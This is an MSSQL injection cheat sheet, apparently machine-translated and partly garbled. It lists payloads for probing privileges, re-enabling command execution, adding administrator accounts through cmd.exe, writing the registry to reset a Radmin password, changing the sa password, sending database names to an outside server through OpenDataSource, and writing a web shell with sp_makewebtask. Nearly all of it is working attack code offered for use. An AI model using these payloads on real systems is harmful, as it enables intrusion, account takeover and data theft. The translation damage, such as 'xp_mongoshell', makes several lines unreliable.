Common injection commands

// Source: z: zhu

See what permissions and 1 = (Select IS_MEMBER ('db _ owner') And char (124) % 2 BCast (IS_MEMBER ('db _ owner ') as varchar (1) % 2 Bchar (124) = 1; -- // check whether you have the permission to read a database and...

// Check the permissions.

And 1 = (Select IS_MEMBER ('db _ owner '))

And char (124) % 2 BCast (IS_MEMBER ('db _ owner') as varchar (1) % 2 Bchar (124) = 1 ;--

// Check whether you have the permission to read a database

And 1 = (Select HAS_DBACCESS ('master '))

And char (124) % 2 BCast (HAS_DBACCESS ('master') as varchar (1) % 2 Bchar (124) = 1 --

Numeric type

And char (124) % 2 Buser % 2 Bchar (124) = 0

Character Type

'And char (124) % 2 Buser % 2 Bchar (124) = 0 and ''='

Search type

'And char (124) % 2 Buser % 2 Bchar (124) = 0 and' % '='

Brute-force Username

And user> 0

'And user> 0 and ''='

Check whether the permission is SA

And 1 = (select IS_SRVROLEMEMBER ('sysadmin '));--

And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 --

Check whether MSSQL database is used

And exists (select * from sysobjects );--

Check whether multiple rows are supported

; Declare @ d int ;--

Restore xp_mongoshell

; Exec master .. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--

Select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ')

//-----------------------

// Execute the command

//-----------------------

First, enable the sandbox mode:

Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Jet/4.0/Engines', 'sandboxmode', 'reg _ dword', 1

Then run the system command using jet. oledb.

Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c:/winnt/system32/ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add ")')

Execute Command

; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c:/WINNT/system32/cmd.exe/C net user paf pafpaf/add ';--

EXEC [master]. [dbo]. [xp_mongoshell] 'COMMAND/c md c:/123'

Determine whether the xp_mongoshell extended storage process exists:

Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ Your shell ')

Write registry

Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Jet/4.0/Engines', 'sandboxmode', 'reg _ dword', 1

REG_SZ

Read Registry

Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/winlogon', 'userinit'

Read directory content

Exec master .. xp_dirtree 'C:/winnt/system32/', 1, 1

Database Backup

Backup database pubs to disk = 'C:/123. Bak'

// Burst length

And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0 ;--

To change the sa password, run the following command:

Exec sp_password NULL, 'new password', 'sa'

Test:

Exec master. dbo. sp_addlogin test, ptlove

Exec master. dbo. sp_addsrvrolemember test, sysadmin

Delete the xp_mongoshell statement in the extended stored procedure:

Exec sp_dropextendedproc 'xp _ export shell'

Added extended storage process

EXEC [master] .. sp_addextendedproc 'xp _ proxiedadata', 'c:/winnt/system32/sqllog. dll'

GRANT exec On xp_proxiedadata TO public

Stop or activate a service.

Exec master.. xp_servicecontrol 'stop', 'schedule'

Exec master.. xp_servicecontrol 'start', 'schedule'

Dbo. xp_subdirs

Only list subdirectories in a directory.

Xp_getfiledetails 'C:/Inetpub/wwwroot/SQLInject/login. asp'

Dbo. xp_makecab

Compress multiple target files to a specific target file.

All files to be compressed can be connected to the end of the parameter column and separated by commas.

Dbo. xp_makecab

'C:/test. cab', 'mszip ', 1,

'C:/Inetpub/wwwroot/SQLInject/login. asp ',

'C:/Inetpub/wwwroot/SQLInject/securelogin. asp'

Xp_terminate_process

Stop a program in execution, but assign the Process ID parameter.

Select "View"-"select field" in the "Work administrator" menu to view the Process ID of each execution program.

Xp_terminate_process 2484

Xp_unpackcab

Uncompress the file.

Xp_unpackcab 'C:/test. cab', 'c:/temp ', 1

A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed. net.exe does not exist. There is no way to use regedit/e to import the registration file, but mssql is the sa permission. Run the following command to EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System/RAdmin/v2.0/Server/Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System/RAdmin/v2.0/Server/Parameters', 'Port', 'reg _ BINARY ', and 0xd20400 change port value to 1234

Create database lcx;

Create TABLE ku (name nvarchar (256) null );

Create TABLE biao (id int NULL, name nvarchar (256) null );

// Obtain the Database Name

Insert into OpenDataSource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; Pwd = pafpaf; database = lcx '). LCX. DBO. ku select name from master. DBO. sysdatabases

// Create a table in the master to check the Permissions

Create Table master .. d_test (ID nvarchar (4000) null, data nvarchar (4000) null );--

Use sp_makewebtask to directly write a sentence in the web directory:

''% 20'"> http: // 127.0.0.1/dblogin123.asp? Username = 123 '; Exec % 20sp_makewebtask % 20 'd:/www/TT/88. asp', '% 20 select % 20''' % 20 ';--

// Update table content

Update films set kind = 'dramatic 'Where id = 123

// Delete content

Delete from table_name where stockid = 3